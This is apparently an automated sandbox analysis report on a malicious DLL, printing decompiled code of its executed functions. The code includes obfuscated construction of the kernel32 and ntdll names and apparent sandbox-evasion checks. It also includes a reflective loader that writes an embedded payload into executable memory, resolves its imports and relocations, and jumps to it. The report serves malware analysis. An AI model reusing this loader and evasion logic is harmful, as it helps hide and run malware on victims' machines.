4 library calls 21180->21189 21185 10003fa6 21182->21185 21190 10003c80 70 API calls 6 library calls 21182->21190 21185->21187 21191 1003a7f6 69 API calls 3 library calls 21185->21191 21187->21111 21190->21185 21191->21187 21192->21123 21193->21123 21195->21125 21196->21125 21197->21130 21198->21126 21199->21116 21200->21119 21201->21150 21393 1000fb05 115 API calls ~_Task_impl 21394 1002ef09 GetFileSize GetLastError GetLastError 21395 10015f0f 114 API calls ~_Task_impl 21397 1002e50d Escape Escape 21398 10008b10 OffsetViewportOrgEx OffsetViewportOrgEx 21399 10018b13 128 API calls ~_Task_impl 21400 1000e713 117 API calls 2 library calls 21402 1001cd19 124 API calls 21403 1001691a 135 API calls 21404 1002c719 116 API calls 21405 1002c51c 125 API calls 3 library calls 21406 10029f1d EnterCriticalSection LeaveCriticalSection 21407 1002f123 86 API calls ~_Task_impl 21408 10025b20 135 API calls 2 library calls 21409 10016d22 127 API calls 21411 10035925 154 API calls 21412 1002ed24 ReadFile GetLastError 21414 1003712b PeekMessageA DispatchMessageA PeekMessageA 21415 10020733 117 API calls 21416 1003f730 79 API calls 3 library calls 21418 10024735 108 API calls 21419 10023738 GetViewportOrgEx 21420 10017340 CreateDataAdviseHolder 21421 1003a742 71 API calls 3 library calls 21422 10039b41 123 API calls 21423 10017142 6 API calls ___init_ctype 21425 10033f45 DrawTextA GetCurrentPositionEx MoveToEx 21426 1003eb44 71 API calls ___InternalCxxFrameHandler 21427 1000c547 DefWindowProcA CallWindowProcA 21428 1002e948 7 API calls ~_Task_impl 21430 1003594e 6 API calls 21431 10008b4d SetViewportExtEx SetViewportExtEx 21432 1001b550 71 API calls 3 library calls 21434 1001d557 83 API calls 21435 10028b59 155 API calls 21436 1002e759 8 API calls ~_Task_impl 21437 1001635f 111 API calls 21439 10005160 151 API calls 2 library calls 21440 1001b360 128 API calls 21441 10014b67 7 API calls 21442 1002ed64 84 API calls 21443 1001cb66 123 API calls 21444 10012768 14 API calls ___init_ctype 21445 1001b76b GetTextExtentPoint32A 21446 1000896b BitBlt 21447 10028f6d 116 API calls ~_Task_impl 21448 10037973 18 API calls 21449 10004570 125 API calls 21450 10037171 PeekMessageA 21451 10034576 213 API calls 2 library calls 21452 10032d7b GetWindowLongA GetWindowLongA AdjustWindowRectEx AdjustWindowRectEx 21454 10044787 103 API calls _write_multi_char 21457 1002d785 131 API calls 3 library calls 21458 10033f8b DrawTextExA GetCurrentPositionEx MoveToEx 21460 10008b8a ScaleViewportExtEx ScaleViewportExtEx 21462 10026588 RegOpenKeyExA RegQueryValueExA RegCloseKey 21463 10033188 GetScrollPos 21464 1001718d 6 API calls ___init_ctype 21465 1001898e lstrcmpA LocalAlloc RaiseException 21466 10005d90 194 API calls ~_Task_impl 21467 10032f90 126 API calls ~_Task_impl 21469 1001bd99 10 API calls 21470 1001f598 SendMessageA LocalAlloc RaiseException ~_Task_impl 21471 1001519d 133 API calls 21472 1002d99e 149 API calls 21473 100527a5 7 API calls ___init_ctype 21474 100103a3 118 API calls ~_Task_impl 21475 100139a2 6 API calls ~_Task_impl 21477 10010ba7 126 API calls 21478 100415a2 104 API calls 5 library calls 21479 1002bda5 10 API calls 21480 1002dda9 132 API calls 21481 1002edaf SetFilePointer GetLastError GetLastError 21482 100181b1 120 API calls 21484 100263b7 162 API calls 21488 1000f1c2 114 API calls 21490 1001cfc4 69 API calls 21491 100477c3 120 API calls 6 library calls 21492 10009bc9 114 API calls 21493 100269ce 157 API calls 21494 1002e9d3 89 API calls 3 library calls 21495 1001b3d4 120 API calls 21497 100419dd 71 API calls 3 library calls 21499 10013bda 118 API calls ~_Task_impl 21500 1001f7da 158 API calls 21501 100149dc 129 API calls 21502 100053e0 225 API calls 4 library calls 21503 100379e6 SendMessageA ScreenToClient SendMessageA 21504 100263e7 90 API calls 21505 1000d1e8 107 API calls 21506 100089ef ExtTextOutA 21507 10016df1 120 API calls 21508 100167f3 113 API calls 21509 1002bbf1 129 API calls ~_Task_impl 21510 1002bff5 113 API calls 21511 1001d7ff 114 API calls

                                                                                                        Executed Functions

                                                                                                        Function 10003360, Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 190librarymemorywindowCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 71%
                                                                                                        			E10003360(void* __ebp) {
				void* _v12;
				signed int _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				signed int _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				char _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				char _v64;
				char _v68;
				SIZE_T* _v72;
				intOrPtr _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				void* _v116;
				char _v132;
				char _v136;
				intOrPtr _v140;
				SIZE_T* _v144;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				signed int _t65;
				struct HINSTANCE__* _t72;
				intOrPtr _t77;
				char* _t79;
				intOrPtr _t81;
				void* _t82;
				intOrPtr _t88;
				void* _t98;
				intOrPtr* _t112;
				void* _t113;
				void* _t115;
				intOrPtr _t119;
				void* _t120;
				void* _t122;
				intOrPtr* _t124;
				void* _t126;
				signed int _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				signed int _t131;

				_push(0xffffffff);
				_push(E10056D5B);
				_push( *[fs:0x0]);
				_t127 = _t126 - 0x88;
				_t63 =  *0x10072650; // 0xb5e27fef
				_v16 = _t63 ^ _t127;
				_t65 =  *0x10072650; // 0xb5e27fef
				_push(_t65 ^ _t127);
				 *[fs:0x0] =  &_v12;
				_v68 = 0xf;
				_v72 = 0;
				_v88 = 0;
				E10003B20( &_v92, "Virtual", 7);
				_v12 = 0;
				_v132 = 0xf;
				_v136 = 0;
				_v152 = 0;
				E10003B20( &_v156, "AllocExNuma", 0xb);
				_push( &_v164);
				_v20 = 1;
				E10003E70( &_v136,  &_v108);
				_t128 = _t127 + 0xc;
				_v20 = 2;
				_t72 = LoadLibraryA("whoami.exe"); // executed
				if(_t72 == 0) {
					MessageBoxA(0, 0x100624cc, 0, 0);
					ExitProcess(0xfff4518a);
				}
				_v42 = 0x65;
				_v36 = 0x65;
				_v34 = 0x6c;
				_v24 = 0x6c;
				_v22 = 0x6c;
				_v58 = 0x6c;
				_v56 = 0x6c;
				_v50 = 0x6c;
				_v48 = 0x6c;
				_t110 = 0x2e;
				 *0x10097068 = 0;
				 *0x1009706c = 0;
				 *0x10097070 = 0;
				 *0x10097074 = 0;
				 *0x10097078 = 0;
				_v44 = 0x6b;
				_v40 = 0x72;
				_v38 = 0x6e;
				_v32 = 0x33;
				_v30 = 0x32;
				_v28 = 0x2e;
				_v26 = 0x64;
				_v20 = 0;
				_v64 = 0x6e;
				_v62 = 0x74;
				_v60 = 0x64;
				_v54 = 0x2e;
				_v52 = 0x64;
				_v46 = 0;
				 *0x10099e84 = E100031D0( &_v44);
				_t77 = E100031D0( &_v64);
				_t119 =  *0x10099e84; // 0x73b60000
				 *0x10099e88 = _t77;
				_t124 = E10002820(_t119, "VirtualAlloc");
				_t79 = _v116;
				_t129 = _t128 + 0xc;
				 *0x10099d78 = _t124;
				if(_v96 < 0x10) {
					_t79 =  &_v116;
				}
				_t112 = E10002820(_t119, _t79);
				 *0x10099d7c = _t112;
				_t81 = E10002820(_t119, "WriteProcessMemory");
				_t130 = _t129 + 8;
				_t135 = _t112;
				 *0x10099d80 = _t81;
				if(_t112 == 0) {
					_t82 =  *_t124(0, 0x23400, 0x3000, 0x40);
				} else {
					_t82 =  *_t112(0xffffffff, 0, 0x23400, 0x3000, 0x40, 0); // executed
				}
				_t120 = _t82;
				WriteProcessMemory(0xffffffff, _t120, 0x10073c28, 0x23400, 0); // executed
				_t113 = E1003A230(0, _t110, _t112, _t120, 0x612d);
				_push(_t113);
				E10002D70(_t135);
				_push(_t120);
				_push(_t113);
				E10002FB0();
				_t131 = _t130 + 0x10;
				_t88 = E100028F0(_t120, _t135);
				_v20 = 1;
				_t136 = _v112 - 0x10;
				 *0x10099e8c = _t88;
				if(_v112 >= 0x10) {
					_t110 = _v132;
					_push(_v132);
					E10007788(0, _t113, 0x10, _t136);
					_t131 = _t131 + 4;
				}
				_v20 = 0;
				_t137 = _v140 - 0x10;
				_v112 = 0xf;
				_v116 = 0;
				_v132 = 0;
				if(_v140 >= 0x10) {
					_push(_v160);
					E10007788(0, 0xf, 0x10, _t137);
					_t131 = _t131 + 4;
				}
				_v20 = 0xffffffff;
				_t138 = _v84 - 0x10;
				_v140 = 0xf;
				_v144 = 0;
				_v160 = 0;
				if(_v84 >= 0x10) {
					_push(_v104);
					E10007788(0, 0xf, 0x10, _t138);
					_t131 = _t131 + 4;
				}
				 *[fs:0x0] = _v28;
				_pop(_t115);
				_pop(_t122);
				_pop(_t98);
				return E10039F21(1, _t98, _v32 ^ _t131, _t110, _t115, _t122);
			}







































































                                                                                                        0x10003360
                                                                                                        0x10003362
                                                                                                        0x1000336d
                                                                                                        0x1000336e
                                                                                                        0x10003374
                                                                                                        0x1000337b
                                                                                                        0x10003386
                                                                                                        0x1000338d
                                                                                                        0x10003395
                                                                                                        0x100033ad
                                                                                                        0x100033b1
                                                                                                        0x100033b5
                                                                                                        0x100033b9
                                                                                                        0x100033be
                                                                                                        0x100033d0
                                                                                                        0x100033d4
                                                                                                        0x100033d8
                                                                                                        0x100033dc
                                                                                                        0x100033e5
                                                                                                        0x100033f0
                                                                                                        0x100033f8
                                                                                                        0x100033fd
                                                                                                        0x10003405
                                                                                                        0x1000340d
                                                                                                        0x10003415
                                                                                                        0x1000341f
                                                                                                        0x1000342a
                                                                                                        0x1000342a
                                                                                                        0x10003435
                                                                                                        0x1000343a
                                                                                                        0x10003447
                                                                                                        0x10003454
                                                                                                        0x1000345c
                                                                                                        0x10003464
                                                                                                        0x10003469
                                                                                                        0x1000346e
                                                                                                        0x10003473
                                                                                                        0x10003478
                                                                                                        0x10003487
                                                                                                        0x1000348d
                                                                                                        0x10003493
                                                                                                        0x10003499
                                                                                                        0x1000349f
                                                                                                        0x100034a5
                                                                                                        0x100034af
                                                                                                        0x100034b9
                                                                                                        0x100034c1
                                                                                                        0x100034cb
                                                                                                        0x100034d5
                                                                                                        0x100034dd
                                                                                                        0x100034e5
                                                                                                        0x100034ed
                                                                                                        0x100034f2
                                                                                                        0x100034f9
                                                                                                        0x100034fe
                                                                                                        0x10003503
                                                                                                        0x10003508
                                                                                                        0x10003517
                                                                                                        0x1000351c
                                                                                                        0x10003521
                                                                                                        0x1000352c
                                                                                                        0x10003536
                                                                                                        0x10003538
                                                                                                        0x1000353c
                                                                                                        0x10003544
                                                                                                        0x1000354a
                                                                                                        0x1000354c
                                                                                                        0x1000354c
                                                                                                        0x10003556
                                                                                                        0x1000355d
                                                                                                        0x10003563
                                                                                                        0x10003568
                                                                                                        0x1000356b
                                                                                                        0x1000356d
                                                                                                        0x10003572
                                                                                                        0x10003595
                                                                                                        0x10003574
                                                                                                        0x10003584
                                                                                                        0x10003584
                                                                                                        0x100035a2
                                                                                                        0x100035a7
                                                                                                        0x100035b7
                                                                                                        0x100035b9
                                                                                                        0x100035ba
                                                                                                        0x100035bf
                                                                                                        0x100035c0
                                                                                                        0x100035c1
                                                                                                        0x100035c6
                                                                                                        0x100035cb
                                                                                                        0x100035d5
                                                                                                        0x100035dd
                                                                                                        0x100035e1
                                                                                                        0x100035e6
                                                                                                        0x100035e8
                                                                                                        0x100035ec
                                                                                                        0x100035ed
                                                                                                        0x100035f2
                                                                                                        0x100035f2
                                                                                                        0x100035fa
                                                                                                        0x10003601
                                                                                                        0x10003605
                                                                                                        0x10003609
                                                                                                        0x1000360d
                                                                                                        0x10003611
                                                                                                        0x10003617
                                                                                                        0x10003618
                                                                                                        0x1000361d
                                                                                                        0x1000361d
                                                                                                        0x10003620
                                                                                                        0x1000362b
                                                                                                        0x1000362f
                                                                                                        0x10003633
                                                                                                        0x10003637
                                                                                                        0x1000363b
                                                                                                        0x10003641
                                                                                                        0x10003642
                                                                                                        0x10003647
                                                                                                        0x10003647
                                                                                                        0x10003656
                                                                                                        0x1000365e
                                                                                                        0x1000365f
                                                                                                        0x10003661
                                                                                                        0x10003676

                                                                                                        APIs
                                                                                                          • Part of subcall function 10003B20: std::_String_base::_Xlen.LIBCPMT ref: 10003B79
                                                                                                          • Part of subcall function 10003B20: _memcpy_s.LIBCMT ref: 10003BC1
                                                                                                        • LoadLibraryA.KERNEL32 ref: 1000340D
                                                                                                        • MessageBoxA.USER32 ref: 1000341F
                                                                                                        • ExitProcess.KERNEL32 ref: 1000342A
                                                                                                        • VirtualAllocExNuma.KERNEL32(000000FF,00000000,00023400,00003000,00000040,00000000,?,?,?,?,whoami.exe,?,?,00000001), ref: 10003584
                                                                                                        • WriteProcessMemory.KERNEL32(000000FF,00000000,10073C28,00023400,00000000,?,?,?,?,whoami.exe,?,?,00000001), ref: 100035A7
                                                                                                        • _malloc.LIBCMT ref: 100035B2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$AllocExitLibraryLoadMemoryMessageNumaString_base::_VirtualWriteXlen_malloc_memcpy_sstd::_
                                                                                                        • String ID: 2$3$AllocExNuma$Virtual$VirtualAlloc$WriteProcessMemory$k$r$t$whoami.exe
                                                                                                        • API String ID: 994591851-3946485921
                                                                                                        • Opcode ID: 9c61376587c97d8699a7e934eefeb59288f19cbfc5aee6d6b65908fd66674986
                                                                                                        • Instruction ID: c0a1e0671d0e3eac80fea2126b87aa602ad3fdf1e64c6740749f95463a10d17d
                                                                                                        • Opcode Fuzzy Hash: 9c61376587c97d8699a7e934eefeb59288f19cbfc5aee6d6b65908fd66674986
                                                                                                        • Instruction Fuzzy Hash: A4718EB59183809AE321DF64CC81B5BBBE8FF99344F50492EF29C872A1EB759404CB57
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100028F0, Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 328memorylibraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 46 100028f0-10002975 call 10002820 * 6 59 10002981-10002987 46->59 60 10002977-10002980 46->60 59->60 61 10002989-10002992 59->61 61->60 62 10002994-100029a2 61->62 63 100029a4-100029ab 62->63 64 100029d7-100029fa GetNativeSystemInfo 62->64 66 100029b0-100029b7 63->66 64->60 65 10002a00-10002a1b VirtualAlloc 64->65 67 10002a33-10002a45 65->67 68 10002a1d-10002a1f 65->68 69 100029c5 66->69 70 100029b9-100029c3 66->70 73 10002a81-10002a90 67->73 74 10002a47-10002a4a 67->74 72 10002a20-10002a2d 68->72 71 100029c7-100029c9 69->71 70->71 75 100029cb 71->75 76 100029cd-100029d5 71->76 72->72 77 10002a2f 72->77 79 10002a92-10002ab0 LoadLibraryA 73->79 80 10002b06-10002b16 73->80 78 10002a50-10002a63 74->78 75->76 76->64 76->66 77->67 85 10002a65-10002a74 78->85 86 10002a7a-10002a7f 78->86 81 10002ab2-10002ab6 79->81 82 10002af8-10002b00 79->82 83 10002bac-10002bba 80->83 84 10002b1c-10002b29 80->84 87 10002ab8 81->87 88 10002ada-10002aeb 81->88 82->79 89 10002b02 82->89 90 10002bc0-10002bc4 83->90 91 10002c88-10002caf 83->91 84->83 92 10002b2f 84->92 85->85 93 10002a76 85->93 86->73 86->78 87->88 94 10002aba-10002ad8 87->94 98 10002aed-10002af6 88->98 89->80 95 10002bc7-10002bd3 90->95 96 10002b30-10002b3f 92->96 93->86 94->98 100 10002bd9-10002bf3 95->100 101 10002c7d-10002c82 95->101 102 10002b41-10002b52 96->102 103 10002b9e-10002ba6 96->103 98->81 98->82 105 10002bf5-10002bf7 100->105 106 10002c16-10002c18 100->106 101->91 101->95 107 10002b54-10002b5d 102->107 108 10002b5f-10002b63 102->108 103->96 104 10002ba8 103->104 104->83 114 10002c07-10002c14 105->114 115 10002bf9-10002c05 105->115 109 10002c34-10002c36 106->109 110 10002c1a-10002c1c 106->110 116 10002b97-10002b9c 107->116 111 10002b70-10002b74 108->111 112 10002b65-10002b6e 108->112 121 10002c38-10002c3d 109->121 122 10002c3f-10002c41 109->122 117 10002c25-10002c27 110->117 118 10002c1e-10002c23 110->118 119 10002b76-10002b85 111->119 120 10002b87-10002b8b 111->120 112->116 123 10002c4c-10002c52 114->123 115->123 116->102 116->103 117->109 124 10002c29-10002c2b 117->124 118->123 119->116 120->116 125 10002b8d-10002b94 120->125 121->123 122->123 126 10002c43-10002c45 122->126 127 10002c54 123->127 128 10002c5a-10002c6f VirtualProtect 123->128 124->122 129 10002c2d-10002c32 124->129 125->116 126->123 130 10002c47 126->130 127->128 128->60 131 10002c75-10002c79 128->131 129->123 130->123 131->101
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E100028F0(intOrPtr* __eax, void* __eflags) {
				void* __esi;
				intOrPtr _t106;
				intOrPtr _t108;
				signed char _t110;
				signed int _t113;
				void* _t114;
				intOrPtr* _t115;
				long _t117;
				long _t118;
				void* _t120;
				signed int _t125;
				int _t128;
				long _t132;
				signed int _t133;
				long* _t135;
				struct HINSTANCE__* _t143;
				signed int _t144;
				long _t147;
				long _t148;
				char* _t153;
				intOrPtr* _t154;
				long _t155;
				signed short* _t156;
				signed int* _t158;
				long _t160;
				long _t161;
				long _t162;
				long _t163;
				unsigned short _t171;
				intOrPtr* _t182;
				intOrPtr _t183;
				long _t184;
				void* _t185;
				intOrPtr _t187;
				intOrPtr _t190;
				long _t193;
				void* _t196;
				long _t197;
				intOrPtr* _t200;
				intOrPtr _t201;
				intOrPtr* _t203;
				void* _t204;
				long _t205;
				long _t207;
				struct HINSTANCE__* _t208;
				long _t209;
				intOrPtr _t211;
				void* _t215;
				unsigned int _t217;
				long _t219;
				signed int _t220;
				long* _t222;
				long _t223;
				long _t224;
				long _t225;
				long _t226;
				long _t227;
				intOrPtr* _t229;
				signed int* _t230;
				intOrPtr* _t232;
				void* _t233;
				void* _t234;

				_t201 =  *0x10099e84; // 0x73b60000
				_t226 = 0;
				_t154 = __eax;
				 *((intOrPtr*)(_t233 + 0x30)) = 0;
				 *((intOrPtr*)(_t233 + 0x2c)) = E10002820(_t201, "LoadLibraryA");
				 *((intOrPtr*)(_t233 + 0x34)) = E10002820(_t201, "GetProcAddress");
				 *((intOrPtr*)(_t233 + 0x30)) = E10002820(_t201, "VirtualAlloc");
				_t106 = E10002820(_t201, "VirtualProtect");
				_t211 =  *0x10099e88; // 0x770b0000
				 *((intOrPtr*)(_t233 + 0x44)) = _t106;
				 *((intOrPtr*)(_t233 + 0x4c)) = E10002820(_t211, "NtFlushInstructionCache");
				_t108 = E10002820(_t201, "GetNativeSystemInfo");
				_t203 =  *((intOrPtr*)(_t154 + 0x3c)) + _t154;
				_t234 = _t233 + 0x18;
				 *((intOrPtr*)(_t234 + 0x1c)) = _t108;
				 *((intOrPtr*)(_t234 + 0x14)) = _t203;
				if( *_t203 == 0x4550) {
					__eflags =  *((short*)(_t203 + 4)) - 0x14c;
					if( *((short*)(_t203 + 4)) != 0x14c) {
						goto L1;
					} else {
						_t110 =  *(_t203 + 0x38);
						__eflags = _t110 & 0x00000001;
						 *(_t234 + 0x18) = _t110;
						if((_t110 & 0x00000001) != 0) {
							goto L1;
						} else {
							_t185 = ( *(_t203 + 0x14) & 0x0000ffff) + _t203 + 0x18;
							_t160 =  *(_t203 + 6) & 0x0000ffff;
							__eflags = _t160;
							if(_t160 > 0) {
								_t200 = _t185 + 0xc;
								 *(_t234 + 0x10) = _t160;
								do {
									_t225 =  *(_t200 + 4);
									__eflags = _t225;
									_t183 =  *_t200;
									if(_t225 != 0) {
										_t184 = _t183 + _t225;
										__eflags = _t184;
									} else {
										_t203 =  *((intOrPtr*)(_t234 + 0x14));
										_t184 = _t183 + _t110;
										_t110 =  *(_t234 + 0x18);
									}
									__eflags = _t184 - _t226;
									if(_t184 > _t226) {
										_t226 = _t184;
									}
									_t200 = _t200 + 0x28;
									_t23 = _t234 + 0x10;
									 *_t23 =  *(_t234 + 0x10) - 1;
									__eflags =  *_t23;
								} while ( *_t23 != 0);
							}
							 *((intOrPtr*)(_t234 + 0x20))(_t234 + 0x38);
							_t187 =  *((intOrPtr*)(_t234 + 0x3c));
							_t161 =  *(_t203 + 0x50);
							_t113 =  !(_t187 - 1);
							__eflags = (_t161 + _t187 - 0x00000001 & _t113) - (_t187 + _t226 - 0x00000001 & _t113);
							if((_t161 + _t187 - 0x00000001 & _t113) != (_t187 + _t226 - 0x00000001 & _t113)) {
								goto L1;
							} else {
								_t114 = VirtualAlloc(0, _t161, 0x3000, 4);
								_t162 =  *(_t203 + 0x54);
								__eflags = _t162;
								_t215 = _t114;
								 *(_t234 + 0x10) = _t215;
								_t115 = _t154;
								if(_t162 != 0) {
									_t224 = _t215 - _t154;
									__eflags = _t224;
									goto L15;
									L15:
									_t162 = _t162 - 1;
									 *((char*)(_t224 + _t115)) =  *_t115;
									_t115 = _t115 + 1;
									__eflags = _t162;
									if(_t162 != 0) {
										goto L15;
									} else {
										_t203 =  *((intOrPtr*)(_t234 + 0x14));
									}
								}
								_t190 =  *((intOrPtr*)(_t234 + 0x14));
								_t227 =  *(_t190 + 6) & 0x0000ffff;
								__eflags = _t227;
								_t204 = ( *(_t203 + 0x14) & 0x0000ffff) + _t203 + 0x18;
								if(_t227 != 0) {
									_t209 = _t204 + 0x14;
									__eflags = _t209;
									do {
										_t223 =  *(_t209 - 4);
										_t153 =  *((intOrPtr*)(_t209 - 8)) +  *(_t234 + 0x10);
										_t227 = _t227 - 1;
										_t182 =  *_t209 + _t154;
										__eflags = _t223;
										if(_t223 != 0) {
											do {
												_t223 = _t223 - 1;
												 *_t153 =  *_t182;
												_t153 = _t153 + 1;
												_t182 = _t182 + 1;
												__eflags = _t223;
											} while (_t223 != 0);
											_t190 =  *((intOrPtr*)(_t234 + 0x14));
										}
										_t209 = _t209 + 0x28;
										__eflags = _t227;
									} while (_t227 != 0);
								}
								_t229 =  *((intOrPtr*)(_t190 + 0x80)) +  *(_t234 + 0x10);
								_t117 =  *(_t229 + 0xc);
								__eflags = _t117;
								if(_t117 != 0) {
									do {
										_t143 = LoadLibraryA(_t117 +  *(_t234 + 0x10));
										_t197 =  *(_t234 + 0x10);
										_t222 =  *((intOrPtr*)(_t229 + 0x10)) + _t197;
										_t158 =  *_t229 + _t197;
										__eflags =  *_t222;
										_t208 = _t143;
										while( *_t222 != 0) {
											_t144 =  *_t158;
											__eflags = _t144;
											if(__eflags == 0 || __eflags >= 0) {
												_t147 =  *_t222 + _t197 + 2;
												__eflags = _t147;
												_t148 =  *((intOrPtr*)(_t234 + 0x30))(_t208, _t147);
												_t197 =  *(_t234 + 0x10);
												 *_t222 = _t148;
											} else {
												 *_t222 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t208 + 0x3c)) + _t208 + 0x78)) + _t208 + 0x1c)) + ((_t144 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t208 + 0x3c)) + _t208 + 0x78)) + _t208 + 0x10))) * 4 + _t208)) + _t208;
											}
											_t222 =  &(_t222[1]);
											_t158 =  &(_t158[1]);
											__eflags =  *_t222;
										}
										_t117 =  *(_t229 + 0x20);
										_t229 = _t229 + 0x14;
										__eflags = _t117;
									} while (_t117 != 0);
									_t190 =  *((intOrPtr*)(_t234 + 0x14));
								}
								_t118 =  *(_t234 + 0x10);
								_t217 = _t118 -  *((intOrPtr*)(_t190 + 0x34));
								__eflags =  *(_t190 + 0xa4);
								if( *(_t190 + 0xa4) != 0) {
									_t232 =  *((intOrPtr*)(_t190 + 0xa0)) + _t118;
									_t132 =  *(_t232 + 4);
									__eflags = _t132;
									if(_t132 != 0) {
										do {
											_t196 =  *_t232 +  *(_t234 + 0x10);
											_t73 = _t132 - 8; // 0x144
											_t207 = _t73 >> 1;
											__eflags = _t207;
											_t156 = _t232 + 8;
											if(_t207 != 0) {
												do {
													_t133 =  *_t156 & 0x0000ffff;
													_t171 = _t133 >> 0xc;
													_t207 = _t207 - 1;
													__eflags = _t171 - 0xa;
													if(_t171 != 0xa) {
														__eflags = _t171 - 3;
														if(_t171 != 3) {
															__eflags = _t171 - 1;
															if(_t171 != 1) {
																__eflags = _t171 - 2;
																if(_t171 == 2) {
																	_t135 = (_t133 & 0x00000fff) + _t196;
																	 *_t135 =  *_t135 + _t217;
																	__eflags =  *_t135;
																}
															} else {
																 *((_t133 & 0x00000fff) + _t196) =  *((_t133 & 0x00000fff) + _t196) + (_t217 >> 0x10);
															}
														} else {
															 *((_t133 & 0x00000fff) + _t196) =  *((_t133 & 0x00000fff) + _t196) + _t217;
														}
													} else {
														 *((_t133 & 0x00000fff) + _t196) =  *((_t133 & 0x00000fff) + _t196) + _t217;
													}
													_t156 =  &(_t156[1]);
													__eflags = _t207;
												} while (_t207 != 0);
											}
											_t232 = _t232 +  *(_t232 + 4);
											_t132 =  *(_t232 + 4);
											__eflags = _t132;
										} while (_t132 != 0);
										_t190 =  *((intOrPtr*)(_t234 + 0x14));
									}
								}
								_t163 =  *(_t190 + 6) & 0x0000ffff;
								__eflags = _t163;
								_t120 = ( *(_t190 + 0x14) & 0x0000ffff) + _t190 + 0x18;
								if(_t163 == 0) {
									L70:
									_t219 =  *((intOrPtr*)(_t190 + 0x28)) +  *(_t234 + 0x10);
									__eflags = _t219;
									 *((intOrPtr*)(_t234 + 0x40))(0xffffffff, 0, 0);
									 *_t219(0x10000000, 1, 1);
									return  *(_t234 + 0x10);
								} else {
									_t205 =  *(_t234 + 0x34);
									_t230 = _t120 + 0x24;
									do {
										_t155 =  *(_t230 - 0x14);
										_t163 = _t163 - 1;
										__eflags = _t155;
										 *(_t234 + 0x28) = _t163;
										if(_t155 <= 0) {
											goto L69;
										} else {
											_t220 =  *_t230;
											_t193 = _t220 >> 0x0000001e & 0x00000001;
											_t125 = _t220 >> 0x1f;
											__eflags = _t220 >> 0x0000001d & 0x00000001;
											if((_t220 >> 0x0000001d & 0x00000001) != 0) {
												__eflags = _t193;
												if(_t193 != 0) {
													L60:
													__eflags = _t125;
													if(_t125 != 0) {
														goto L62;
													} else {
														_t205 = 0x20;
													}
												} else {
													__eflags = _t125;
													if(_t125 != 0) {
														__eflags = _t193;
														if(_t193 != 0) {
															goto L60;
														} else {
															__eflags = _t125;
															if(_t125 == 0) {
																L62:
																__eflags = _t193;
																if(_t193 != 0) {
																	__eflags = _t125;
																	if(_t125 != 0) {
																		_t205 = 0x40;
																	}
																}
															} else {
																_t205 = 0x80;
															}
														}
													} else {
														_t205 = 0x10;
													}
												}
											} else {
												__eflags = _t193;
												if(_t193 != 0) {
													__eflags = _t125;
													_t205 = (0 | _t125 != 0x00000000) + (0 | _t125 != 0x00000000) + 2;
												} else {
													asm("sbb eax, eax");
													_t205 = ( ~_t125 & 0x00000007) + 1;
												}
											}
											__eflags = _t220 & 0x04000000;
											if((_t220 & 0x04000000) != 0) {
												_t205 = _t205 | 0x00000200;
												__eflags = _t205;
											}
											_t128 = VirtualProtect( *((intOrPtr*)(_t230 - 0x18)) +  *(_t234 + 0x10), _t155, _t205, _t234 + 0x2c);
											__eflags = _t128;
											if(_t128 == 0) {
												goto L1;
											} else {
												_t190 =  *((intOrPtr*)(_t234 + 0x14));
												_t163 =  *(_t234 + 0x28);
												goto L69;
											}
										}
										goto L71;
										L69:
										_t230 =  &(_t230[0xa]);
										__eflags = _t163;
									} while (_t163 != 0);
									goto L70;
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
				L71:
			}

































































                                                                                                        0x100028f7
                                                                                                        0x100028fd
                                                                                                        0x10002906
                                                                                                        0x10002908
                                                                                                        0x10002916
                                                                                                        0x10002924
                                                                                                        0x10002932
                                                                                                        0x10002936
                                                                                                        0x1000293b
                                                                                                        0x10002946
                                                                                                        0x10002956
                                                                                                        0x1000295a
                                                                                                        0x10002962
                                                                                                        0x10002964
                                                                                                        0x1000296d
                                                                                                        0x10002971
                                                                                                        0x10002975
                                                                                                        0x10002981
                                                                                                        0x10002987
                                                                                                        0x00000000
                                                                                                        0x10002989
                                                                                                        0x10002989
                                                                                                        0x1000298c
                                                                                                        0x1000298e
                                                                                                        0x10002992
                                                                                                        0x00000000
                                                                                                        0x10002994
                                                                                                        0x10002998
                                                                                                        0x1000299c
                                                                                                        0x100029a0
                                                                                                        0x100029a2
                                                                                                        0x100029a4
                                                                                                        0x100029a7
                                                                                                        0x100029b0
                                                                                                        0x100029b0
                                                                                                        0x100029b3
